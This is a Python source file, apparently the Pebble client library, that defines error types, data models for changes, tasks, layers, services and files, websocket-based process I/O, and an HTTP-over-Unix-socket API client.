def _start_thread(target, *args, **kwargs) -> threading.Thread:
"""Helper to simplify starting a thread."""
thread = threading.Thread(target=target, args=args, kwargs=kwargs)
thread.start()
return thread
class Error(Exception):
"""Base class of most errors raised by the Pebble client."""
def __repr__(self):
return '<{}.{} {}>'.format(type(self).__module__, type(self).__name__, self.args)
    def name(self):
        """Return a string representation of the module plus class."""
return '<{}.{}>'.format(type(self).__module__, type(self).__name__)
def message(self):
"""Return the message passed as an argument."""
return self.args[0]
class TimeoutError(TimeoutError, Error):
"""Raised when a polling timeout occurs."""
class ConnectionError(Error):
"""Raised when the Pebble client can't connect to the socket."""
class ProtocolError(Error):
"""Raised when there's a higher-level protocol error talking to Pebble."""
class PathError(Error):
"""Raised when there's an error with a specific path."""
def __init__(self, kind: str, message: str):
"""This shouldn't be instantiated directly."""
self.kind = kind
self.message = message
def __str__(self):
return '{} - {}'.format(self.kind, self.message)
def __repr__(self):
return 'PathError({!r}, {!r})'.format(self.kind, self.message)
class APIError(Error):
"""Raised when an HTTP API error occurs talking to the Pebble server."""
def __init__(self, body: typing.Dict, code: int, status: str, message: str):
"""This shouldn't be instantiated directly."""
super().__init__(message) # Makes str(e) return message
self.body = body
self.code = code
self.status = status
self.message = message
def __repr__(self):
return 'APIError({!r}, {!r}, {!r}, {!r})'.format(
self.body, self.code, self.status, self.message)
class ChangeError(Error):
"""Raised by actions when a change is ready but has an error.
For example, this happens when you attempt to start an already-started
service:
cannot perform the following tasks:
- Start service "test" (service "test" was previously started)
"""
def __init__(self, err: str, change: 'Change'):
"""This shouldn't be instantiated directly."""
self.err = err
self.change = change
def __str__(self):
parts = [self.err]
# Append any task logs to the error message
for i, task in enumerate(self.change.tasks):
if not task.log:
continue
parts.append('\n----- Logs from task {} -----\n'.format(i))
parts.append('\n'.join(task.log))
if len(parts) > 1:
parts.append('\n-----')
return ''.join(parts)
def __repr__(self):
return 'ChangeError({!r}, {!r})'.format(self.err, self.change)
class ExecError(Error):
"""Raised when a :meth:`Client.exec` command returns a non-zero exit code.
Attributes:
command: Command line of command being executed.
exit_code: The process's exit code. This will always be non-zero.
stdout: If :meth:`ExecProcess.wait_output` was being called, this is
the captured stdout as a str (or bytes if encoding was None). If
:meth:`ExecProcess.wait` was being called, this is None.
stderr: If :meth:`ExecProcess.wait_output` was being called and
combine_stderr was False, this is the captured stderr as a str (or
bytes if encoding was None). If :meth:`ExecProcess.wait` was being
called or combine_stderr was True, this is None.
"""
STR_MAX_OUTPUT = 1024
def __init__(
self,
command: typing.List[str],
exit_code: int,
stdout: typing.Optional[typing.AnyStr],
stderr: typing.Optional[typing.AnyStr],
):
self.command = command
self.exit_code = exit_code
self.stdout = stdout
self.stderr = stderr
def __str__(self):
message = 'non-zero exit code {} executing {!r}'.format(
self.exit_code, self.command)
for name, out in [('stdout', self.stdout), ('stderr', self.stderr)]:
if out is None:
continue
truncated = ' [truncated]' if len(out) > self.STR_MAX_OUTPUT else ''
out = out[:self.STR_MAX_OUTPUT]
message = '{}, {}={!r}{}'.format(message, name, out, truncated)
return message
class WarningState(enum.Enum):
"""Enum of states for get_warnings() select parameter."""
ALL = 'all'
PENDING = 'pending'
class ChangeState(enum.Enum):
"""Enum of states for get_changes() select parameter."""
ALL = 'all'
IN_PROGRESS = 'in-progress'
READY = 'ready'
class SystemInfo:
"""System information object."""
def __init__(self, version: str):
self.version = version
@classmethod
def from_dict(cls, d: typing.Dict) -> 'SystemInfo':
"""Create new SystemInfo object from dict parsed from JSON."""
return cls(version=d['version'])
def __repr__(self):
return 'SystemInfo(version={self.version!r})'.format(self=self)
class Warning:
"""Warning object."""
def __init__(
self,
message: str,
first_added: datetime.datetime,
last_added: datetime.datetime,
last_shown: typing.Optional[datetime.datetime],
expire_after: str,
repeat_after: str,
):
self.message = message
self.first_added = first_added
self.last_added = last_added
self.last_shown = last_shown
self.expire_after = expire_after
self.repeat_after = repeat_after
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Warning':
"""Create new Warning object from dict parsed from JSON."""
return cls(
message=d['message'],
first_added=_parse_timestamp(d['first-added']),
last_added=_parse_timestamp(d['last-added']),
last_shown=_parse_timestamp(d['last-shown']) if d.get('last-shown') else None,
expire_after=d['expire-after'],
repeat_after=d['repeat-after'],
)
def __repr__(self):
return ('Warning('
'message={self.message!r}, '
'first_added={self.first_added!r}, '
'last_added={self.last_added!r}, '
'last_shown={self.last_shown!r}, '
'expire_after={self.expire_after!r}, '
'repeat_after={self.repeat_after!r})'
).format(self=self)
class TaskProgress:
"""Task progress object."""
def __init__(
self,
label: str,
done: int,
total: int,
):
self.label = label
self.done = done
self.total = total
@classmethod
def from_dict(cls, d: typing.Dict) -> 'TaskProgress':
"""Create new TaskProgress object from dict parsed from JSON."""
return cls(
label=d['label'],
done=d['done'],
total=d['total'],
)
def __repr__(self):
return ('TaskProgress('
'label={self.label!r}, '
'done={self.done!r}, '
'total={self.total!r})'
).format(self=self)
class TaskID(str):
"""Task ID (a more strongly-typed string)."""
def __repr__(self):
return 'TaskID({!r})'.format(str(self))
class Task:
"""Task object."""
def __init__(
self,
id: TaskID,
kind: str,
summary: str,
status: str,
log: typing.List[str],
progress: TaskProgress,
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.log = log
self.progress = progress
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Task':
"""Create new Task object from dict parsed from JSON."""
return cls(
id=TaskID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
log=d.get('log') or [],
progress=TaskProgress.from_dict(d['progress']),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Task('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'log={self.log!r}, '
'progress={self.progress!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class ChangeID(str):
"""Change ID (a more strongly-typed string)."""
def __repr__(self):
return 'ChangeID({!r})'.format(str(self))
class Change:
"""Change object."""
def __init__(
self,
id: ChangeID,
kind: str,
summary: str,
status: str,
tasks: typing.List[Task],
ready: bool,
err: typing.Optional[str],
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.tasks = tasks
self.ready = ready
self.err = err
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Change':
"""Create new Change object from dict parsed from JSON."""
return cls(
id=ChangeID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
tasks=[Task.from_dict(t) for t in d.get('tasks') or []],
ready=d['ready'],
err=d.get('err'),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Change('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'tasks={self.tasks!r}, '
'ready={self.ready!r}, '
'err={self.err!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class Plan:
"""Represents the effective Pebble configuration."""
def __init__(self, raw: str):
d = yaml.safe_load(raw) or {}
self._raw = raw
self._services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
@property
def services(self):
"""This plan's services mapping (maps service name to Service).
This property is currently read-only.
"""
return self._services
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this plan to its dict representation."""
as_dicts = {name: service.to_dict() for name, service in self._services.items()}
if not as_dicts:
return {}
return {
'services': as_dicts,
}
def to_yaml(self) -> str:
"""Return this plan's YAML representation."""
return yaml.safe_dump(self.to_dict())
__str__ = to_yaml
class Layer:
"""Represents a Pebble configuration layer.
The format of this is not documented, but is captured in code here:
https://github.com/canonical/pebble/blob/master/internal/plan/plan.go
Attributes:
summary: A summary of the purpose of this layer
description: A long form description of this layer
services: A mapping of name: :class:`Service` defined by this layer
"""
# This is how you do type annotations, but it is not supported by Python 3.5
# summary: str
# description: str
# services: typing.Mapping[str, 'Service']
def __init__(self, raw: typing.Union[str, typing.Dict] = None):
if isinstance(raw, str):
d = yaml.safe_load(raw) or {}
else:
d = raw or {}
self.summary = d.get('summary', '')
self.description = d.get('description', '')
self.services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
def to_yaml(self) -> str:
"""Convert this layer to its YAML representation."""
return yaml.safe_dump(self.to_dict())
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this layer to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('services', {name: service.to_dict() for name, service in self.services.items()})
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Layer({!r})'.format(self.to_dict())
__str__ = to_yaml
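# Example (sketch, assumed service fields): round-trip a minimal layer.
#   layer = Layer('summary: demo\nservices:\n  srv1:\n    override: replace\n    command: /bin/sleep 10\n')
#   layer.services['srv1'].command  # -> '/bin/sleep 10'
#   layer.to_dict()  # -> {'summary': 'demo', 'services': {'srv1': {...}}}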
class Service:
"""Represents a service description in a Pebble configuration layer."""
def __init__(self, name: str, raw: typing.Dict = None):
self.name = name
raw = raw or {}
self.summary = raw.get('summary', '')
self.description = raw.get('description', '')
self.startup = raw.get('startup', '')
self.override = raw.get('override', '')
self.command = raw.get('command', '')
self.after = list(raw.get('after', []))
self.before = list(raw.get('before', []))
self.requires = list(raw.get('requires', []))
self.environment = dict(raw.get('environment', {}))
self.user = raw.get('user', '')
self.user_id = raw.get('user-id')
self.group = raw.get('group', '')
self.group_id = raw.get('group-id')
def to_dict(self) -> typing.Dict:
"""Convert this service object to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('startup', self.startup),
('override', self.override),
('command', self.command),
('after', self.after),
('before', self.before),
('requires', self.requires),
('environment', self.environment),
('user', self.user),
('user-id', self.user_id),
('group', self.group),
('group-id', self.group_id),
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Service({!r})'.format(self.to_dict())
def __eq__(self, other: typing.Union[typing.Dict, 'Service']) -> bool:
"""Compare this service description to another."""
if isinstance(other, dict):
return self.to_dict() == other
elif isinstance(other, Service):
return self.to_dict() == other.to_dict()
else:
raise ValueError(
"Cannot compare pebble.Service to {}".format(type(other))
)
class ServiceStartup(enum.Enum):
"""Enum of service startup options."""
ENABLED = 'enabled'
DISABLED = 'disabled'
class ServiceStatus(enum.Enum):
"""Enum of service statuses."""
ACTIVE = 'active'
INACTIVE = 'inactive'
ERROR = 'error'
class ServiceInfo:
"""Service status information."""
def __init__(
self,
name: str,
startup: typing.Union[ServiceStartup, str],
current: typing.Union[ServiceStatus, str],
):
self.name = name
self.startup = startup
self.current = current
def is_running(self) -> bool:
"""Return True if this service is running (in the active state)."""
return self.current == ServiceStatus.ACTIVE
@classmethod
def from_dict(cls, d: typing.Dict) -> 'ServiceInfo':
"""Create new ServiceInfo object from dict parsed from JSON."""
try:
startup = ServiceStartup(d['startup'])
except ValueError:
startup = d['startup']
try:
current = ServiceStatus(d['current'])
except ValueError:
current = d['current']
return cls(
name=d['name'],
startup=startup,
current=current,
)
def __repr__(self):
return ('ServiceInfo('
'name={self.name!r}, '
'startup={self.startup}, '
'current={self.current})'
).format(self=self)
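# Editor's example (not part of the original module): ServiceInfo.from_dict
# falls back to the raw string when the server reports a startup or status
# value this client doesn't know. The dict values below are illustrative only.
def _example_service_info():
    info = ServiceInfo.from_dict(
        {'name': 'srv1', 'startup': 'enabled', 'current': 'active'})
    assert info.startup is ServiceStartup.ENABLED and info.is_running()
    unknown = ServiceInfo.from_dict(
        {'name': 'srv2', 'startup': 'enabled', 'current': 'not-yet-defined'})
    assert unknown.current == 'not-yet-defined'  # kept as a plain str
    return info, unknown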
class FileType(enum.Enum):
"""Enum of file types."""
FILE = 'file'
DIRECTORY = 'directory'
SYMLINK = 'symlink'
SOCKET = 'socket'
NAMED_PIPE = 'named-pipe'
DEVICE = 'device'
UNKNOWN = 'unknown'
class FileInfo:
"""Stat-like information about a single file or directory."""
def __init__(
self,
path: str,
name: str,
type: typing.Union['FileType', str],
size: typing.Optional[int],
permissions: int,
last_modified: datetime.datetime,
user_id: typing.Optional[int],
user: typing.Optional[str],
group_id: typing.Optional[int],
group: typing.Optional[str],
):
self.path = path
self.name = name
self.type = type
self.size = size
self.permissions = permissions
self.last_modified = last_modified
self.user_id = user_id
self.user = user
self.group_id = group_id
self.group = group
@classmethod
def from_dict(cls, d: typing.Dict) -> 'FileInfo':
"""Create new FileInfo object from dict parsed from JSON."""
try:
file_type = FileType(d['type'])
except ValueError:
file_type = d['type']
return cls(
path=d['path'],
name=d['name'],
type=file_type,
size=d.get('size'),
permissions=int(d['permissions'], 8),
last_modified=_parse_timestamp(d['last-modified']),
user_id=d.get('user-id'),
user=d.get('user'),
group_id=d.get('group-id'),
group=d.get('group'),
)
def __repr__(self):
return ('FileInfo('
'path={self.path!r}, '
'name={self.name!r}, '
'type={self.type}, '
'size={self.size}, '
'permissions=0o{self.permissions:o}, '
'last_modified={self.last_modified!r}, '
'user_id={self.user_id}, '
'user={self.user!r}, '
'group_id={self.group_id}, '
'group={self.group!r})'
).format(self=self)
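# Editor's example (not part of the original module): FileInfo.from_dict
# expects permissions as an octal string and last-modified as an RFC 3339
# timestamp; all field values below are illustrative assumptions.
def _example_file_info() -> 'FileInfo':
    info = FileInfo.from_dict({
        'path': '/etc/hosts',
        'name': 'hosts',
        'type': 'file',
        'size': 123,
        'permissions': '644',  # parsed with int(..., 8) into 0o644
        'last-modified': '2021-01-28T14:37:02.247202105+13:00',
        'user-id': 0,
        'user': 'root',
        'group-id': 0,
        'group': 'root',
    })
    assert info.permissions == 0o644 and info.type is FileType.FILE
    return info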
class ExecProcess:
"""Represents a process started by :meth:`Client.exec`.
To avoid deadlocks, most users should use :meth:`wait_output` instead of
reading and writing the :attr:`stdin`, :attr:`stdout`, and :attr:`stderr`
attributes directly. Alternatively, users can pass stdin/stdout/stderr to
:meth:`Client.exec`.
This class should not be instantiated directly, only via
:meth:`Client.exec`.
Attributes:
stdin: If the stdin argument was not passed to :meth:`Client.exec`,
this is a writable file-like object the caller can use to stream
input to the process. It is None if stdin was passed to
:meth:`Client.exec`.
stdout: If the stdout argument was not passed to :meth:`Client.exec`,
this is a readable file-like object the caller can use to stream
output from the process. It is None if stdout was passed to
:meth:`Client.exec`.
stderr: If the stderr argument was not passed to :meth:`Client.exec`
and combine_stderr was False, this is a readable file-like object
the caller can use to stream error output from the process. It is
None if stderr was passed to :meth:`Client.exec` or combine_stderr
was True.
"""
def __init__(
self,
stdin: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stdout: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stderr: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
client: 'Client',
timeout: typing.Optional[float],
control_ws: websocket.WebSocket,
stdio_ws: websocket.WebSocket,
stderr_ws: websocket.WebSocket,
command: typing.List[str],
encoding: typing.Optional[str],
change_id: ChangeID,
cancel_stdin: typing.Callable[[], None],
cancel_reader: typing.Optional[int],
threads: typing.List[threading.Thread],
):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self._client = client
self._timeout = timeout
self._control_ws = control_ws
self._stdio_ws = stdio_ws
self._stderr_ws = stderr_ws
self._command = command
self._encoding = encoding
self._change_id = change_id
self._cancel_stdin = cancel_stdin
self._cancel_reader = cancel_reader
self._threads = threads
self._waited = False
def __del__(self):
if not self._waited:
msg = 'ExecProcess instance garbage collected without call to wait() or wait_output()'
warnings.warn(msg, ResourceWarning)
def wait(self):
"""Wait for the process to finish.
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
exit_code = self._wait()
if exit_code != 0:
raise ExecError(self._command, exit_code, None, None)
def _wait(self):
self._waited = True
timeout = self._timeout
if timeout is not None:
# A bit more than the command timeout to ensure that happens first
timeout += 1
change = self._client.wait_change(self._change_id, timeout=timeout)
# If stdin reader thread is running, stop it
if self._cancel_stdin is not None:
self._cancel_stdin()
# Wait for all threads to finish (e.g., message barrier sent)
for thread in self._threads:
thread.join()
# If we opened a cancel_reader pipe, close the read side now (write
        # side was already closed by _cancel_stdin()).
if self._cancel_reader is not None:
os.close(self._cancel_reader)
# Close websockets (shutdown doesn't send CLOSE message or wait for response).
self._control_ws.shutdown()
self._stdio_ws.shutdown()
if self._stderr_ws is not None:
self._stderr_ws.shutdown()
if change.err:
raise ChangeError(change.err, change)
exit_code = -1
if change.tasks:
exit_code = change.tasks[0].data.get('exit-code', -1)
return exit_code
def wait_output(self) -> typing.Tuple[typing.AnyStr, typing.AnyStr]:
"""Wait for the process to finish and return tuple of (stdout, stderr).
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration. If combine_stderr was True, stdout will include
the process's standard error, and stderr will be None.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
if self._encoding is not None:
out = io.StringIO()
err = io.StringIO() if self.stderr is not None else None
else:
out = io.BytesIO()
err = io.BytesIO() if self.stderr is not None else None
t = _start_thread(shutil.copyfileobj, self.stdout, out)
self._threads.append(t)
if self.stderr is not None:
t = _start_thread(shutil.copyfileobj, self.stderr, err)
self._threads.append(t)
exit_code = self._wait()
out_value = out.getvalue()
err_value = err.getvalue() if err is not None else None
if exit_code != 0:
raise ExecError(self._command, exit_code, out_value, err_value)
return (out_value, err_value)
def send_signal(self, sig: typing.Union[int, str]):
"""Send the given signal to the running process.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
"""
if isinstance(sig, int):
sig = signal.Signals(sig).name
payload = {
'command': 'signal',
'signal': {'name': sig},
}
msg = json.dumps(payload, sort_keys=True)
self._control_ws.send(msg)
def _has_fileno(f):
"""Return True if the file-like object has a valid fileno() method."""
try:
f.fileno()
return True
except Exception:
# Some types define a fileno method that raises io.UnsupportedOperation,
# but just catching all exceptions here won't hurt.
return False
def _reader_to_websocket(reader, ws, encoding, cancel_reader=None, bufsize=16 * 1024):
"""Read reader through to EOF and send each chunk read to the websocket."""
while True:
if cancel_reader is not None:
# Wait for either a read to be ready or the caller to cancel stdin
result = select.select([cancel_reader, reader], [], [])
if cancel_reader in result[0]:
break
chunk = reader.read(bufsize)
if not chunk:
break
if isinstance(chunk, str):
chunk = chunk.encode(encoding)
ws.send_binary(chunk)
ws.send('{"command":"end"}') # Send "end" command as TEXT frame to signal EOF
def _websocket_to_writer(ws, writer, encoding):
"""Receive messages from websocket (until end signal) and write to writer."""
while True:
chunk = ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command (EOF signal), stop thread
break
if encoding is not None:
chunk = chunk.decode(encoding)
writer.write(chunk)
class _WebsocketWriter(io.BufferedIOBase):
"""A writable file-like object that sends what's written to it to a websocket."""
def __init__(self, ws):
self.ws = ws
def writable(self):
"""Denote this file-like object as writable."""
return True
def write(self, chunk):
"""Write chunk to the websocket."""
if not isinstance(chunk, bytes):
raise TypeError('value to write must be bytes, not {}'.format(type(chunk).__name__))
self.ws.send_binary(chunk)
return len(chunk)
def close(self):
"""Send end-of-file message to websocket."""
self.ws.send('{"command":"end"}')
class _WebsocketReader(io.BufferedIOBase):
"""A readable file-like object whose reads come from a websocket."""
def __init__(self, ws):
self.ws = ws
self.remaining = b''
self.eof = False
def readable(self):
"""Denote this file-like object as readable."""
return True
def read(self, n=-1):
"""Read up to n bytes from the websocket (or one message if n<0)."""
if self.eof:
# Calling read() multiple times after EOF should still return EOF
return b''
while not self.remaining:
chunk = self.ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command, return EOF designator
self.eof = True
return b''
self.remaining = chunk
if n < 0:
n = len(self.remaining)
result = self.remaining[:n]
self.remaining = self.remaining[n:]
return result
def read1(self, n=-1):
"""An alias for read."""
return self.read(n)
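# Editor's example (not part of the original module): the stdio websockets
# carry output as BINARY frames and signal EOF with a TEXT frame containing
# {"command": "end"}. The stub websocket below is a test double showing how
# _WebsocketReader consumes that framing; it is not part of the API.
class _StubWebsocket:
    def __init__(self, frames):
        self._frames = list(frames)
    def recv(self):
        return self._frames.pop(0)
def _example_websocket_reader() -> bytes:
    ws = _StubWebsocket([b'hello ', b'world', '{"command":"end"}'])
    reader = _WebsocketReader(ws)
    data = b''
    while True:
        chunk = reader.read()
        if not chunk:  # b'' means the "end" command was received
            break
        data += chunk
    return data  # b'hello world'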
class Client:
"""Pebble API client."""
_chunk_size = 8192
def __init__(self, socket_path=None, opener=None, base_url='http://localhost', timeout=5.0):
"""Initialize a client instance.
Defaults to using a Unix socket at socket_path (which must be specified
unless a custom opener is provided).
"""
if opener is None:
if socket_path is None:
raise ValueError('no socket path provided')
opener = self._get_default_opener(socket_path)
self.socket_path = socket_path
self.opener = opener
self.base_url = base_url
self.timeout = timeout
@classmethod
def _get_default_opener(cls, socket_path):
"""Build the default opener to use for requests (HTTP over Unix socket)."""
opener = urllib.request.OpenerDirector()
opener.add_handler(_UnixSocketHandler(socket_path))
opener.add_handler(urllib.request.HTTPDefaultErrorHandler())
opener.add_handler(urllib.request.HTTPRedirectHandler())
opener.add_handler(urllib.request.HTTPErrorProcessor())
return opener
def _request(
self, method: str, path: str, query: typing.Dict = None, body: typing.Dict = None,
) -> typing.Dict:
"""Make a JSON request to the Pebble server with the given HTTP method and path.
If query dict is provided, it is encoded and appended as a query string
        to the URL. If body dict is provided, it is serialized as JSON and used
as the HTTP body (with Content-Type: "application/json"). The resulting
body is decoded from JSON.
"""
headers = {'Accept': 'application/json'}
data = None
if body is not None:
data = json.dumps(body).encode('utf-8')
headers['Content-Type'] = 'application/json'
response = self._request_raw(method, path, query, headers, data)
self._ensure_content_type(response.headers, 'application/json')
return _json_loads(response.read())
@staticmethod
def _ensure_content_type(headers, expected):
"""Parse Content-Type header from headers and ensure it's equal to expected.
Return a dict of any options in the header, e.g., {'boundary': ...}.
"""
ctype, options = cgi.parse_header(headers.get('Content-Type', ''))
if ctype != expected:
raise ProtocolError('expected Content-Type {!r}, got {!r}'.format(expected, ctype))
return options
def _request_raw(
self, method: str, path: str, query: typing.Dict = None, headers: typing.Dict = None,
data: bytes = None,
) -> http.client.HTTPResponse:
"""Make a request to the Pebble server; return the raw HTTPResponse object."""
url = self.base_url + path
if query:
url = url + '?' + urllib.parse.urlencode(query)
# python 3.5 urllib requests require their data to be a bytes object -
# generators won't work.
if sys.version_info[:2] < (3, 6) and isinstance(data, types.GeneratorType):
data = b''.join(data)
if headers is None:
headers = {}
request = urllib.request.Request(url, method=method, data=data, headers=headers)
try:
response = self.opener.open(request, timeout=self.timeout)
except urllib.error.HTTPError as e:
code = e.code
status = e.reason
try:
body = _json_loads(e.read())
message = body['result']['message']
except (IOError, ValueError, KeyError) as e2:
# Will only happen on read error or if Pebble sends invalid JSON.
body = {}
message = '{} - {}'.format(type(e2).__name__, e2)
raise APIError(body, code, status, message)
except urllib.error.URLError as e:
raise ConnectionError(e.reason)
return response
def get_system_info(self) -> SystemInfo:
"""Get system info."""
resp = self._request('GET', '/v1/system-info')
return SystemInfo.from_dict(resp['result'])
def get_warnings(self, select: WarningState = WarningState.PENDING) -> typing.List[Warning]:
"""Get list of warnings in given state (pending or all)."""
query = {'select': select.value}
resp = self._request('GET', '/v1/warnings', query)
return [Warning.from_dict(w) for w in resp['result']]
def ack_warnings(self, timestamp: datetime.datetime) -> int:
"""Acknowledge warnings up to given timestamp, return number acknowledged."""
body = {'action': 'okay', 'timestamp': timestamp.isoformat()}
resp = self._request('POST', '/v1/warnings', body=body)
return resp['result']
def get_changes(
self, select: ChangeState = ChangeState.IN_PROGRESS, service: str = None,
) -> typing.List[Change]:
"""Get list of changes in given state, filter by service name if given."""
query = {'select': select.value}
if service is not None:
query['for'] = service
resp = self._request('GET', '/v1/changes', query)
return [Change.from_dict(c) for c in resp['result']]
def get_change(self, change_id: ChangeID) -> Change:
"""Get single change by ID."""
resp = self._request('GET', '/v1/changes/{}'.format(change_id))
return Change.from_dict(resp['result'])
def abort_change(self, change_id: ChangeID) -> Change:
"""Abort change with given ID."""
body = {'action': 'abort'}
resp = self._request('POST', '/v1/changes/{}'.format(change_id), body=body)
return Change.from_dict(resp['result'])
def autostart_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Start the startup-enabled services and wait (poll) for them to be started.
Args:
timeout: Seconds before autostart change is considered timed out (float).
            delay: Seconds between poll attempts while waiting for the change (float).
Returns:
ChangeID of the autostart change.
Raises:
ChangeError: if one or more of the services didn't start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('autostart', [], timeout, delay)
def replan_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Replan by (re)starting changed and startup-enabled services and wait for them to start.
Args:
timeout: Seconds before replan change is considered timed out (float).
            delay: Seconds between poll attempts while waiting for the change (float).
Returns:
ChangeID of the replan change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('replan', [], timeout, delay)
def start_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Start services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to start.
timeout: Seconds before start change is considered timed out (float).
            delay: Seconds between poll attempts while waiting for the change (float).
Returns:
ChangeID of the start change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('start', services, timeout, delay)
def stop_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Stop services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to stop.
timeout: Seconds before stop change is considered timed out (float).
            delay: Seconds between poll attempts while waiting for the change (float).
Returns:
ChangeID of the stop change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('stop', services, timeout, delay)
def restart_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Restart services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to restart.
timeout: Seconds before restart change is considered timed out (float).
            delay: Seconds between poll attempts while waiting for the change (float).
Returns:
ChangeID of the restart change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('restart', services, timeout, delay)
def _services_action(
self, action: str, services: typing.Iterable[str], timeout: float, delay: float,
) -> ChangeID:
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
body = {'action': action, 'services': services}
resp = self._request('POST', '/v1/services', body=body)
change_id = ChangeID(resp['change'])
if timeout:
change = self.wait_change(change_id, timeout=timeout, delay=delay)
if change.err:
raise ChangeError(change.err, change)
return change_id
def wait_change(
self, change_id: ChangeID, timeout: float = 30.0, delay: float = 0.1,
) -> Change:
"""Wait for the given change to be ready.
If the Pebble server supports the /v1/changes/{id}/wait API endpoint,
use that to avoid polling, otherwise poll /v1/changes/{id} every delay
seconds.
Args:
change_id: Change ID of change to wait for.
timeout: Maximum time in seconds to wait for the change to be
ready. May be None, in which case wait_change never times out.
delay: If polling, this is the delay in seconds between attempts.
Returns:
The Change object being waited on.
Raises:
TimeoutError: If the maximum timeout is reached.
"""
try:
return self._wait_change_using_wait(change_id, timeout)
except NotImplementedError:
# Pebble server doesn't support wait endpoint, fall back to polling
return self._wait_change_using_polling(change_id, timeout, delay)
def _wait_change_using_wait(self, change_id, timeout):
"""Wait for a change to be ready using the wait-change API."""
deadline = time.time() + timeout if timeout is not None else None
# Hit the wait endpoint every Client.timeout-1 seconds to avoid long
# requests (the -1 is to ensure it wakes up before the socket timeout)
while True:
this_timeout = max(self.timeout - 1, 1) # minimum of 1 second
if timeout is not None:
time_remaining = deadline - time.time()
if time_remaining <= 0:
break
# Wait the lesser of the time remaining and Client.timeout-1
this_timeout = min(time_remaining, this_timeout)
try:
return self._wait_change(change_id, this_timeout)
except TimeoutError:
# Catch timeout from wait endpoint and loop to check deadline
pass
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def _wait_change(self, change_id: ChangeID, timeout: float = None) -> Change:
"""Call the wait-change API endpoint directly."""
query = {}
if timeout is not None:
query['timeout'] = _format_timeout(timeout)
try:
resp = self._request('GET', '/v1/changes/{}/wait'.format(change_id), query)
except APIError as e:
if e.code == 404:
raise NotImplementedError('server does not implement wait-change endpoint')
if e.code == 504:
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
raise
return Change.from_dict(resp['result'])
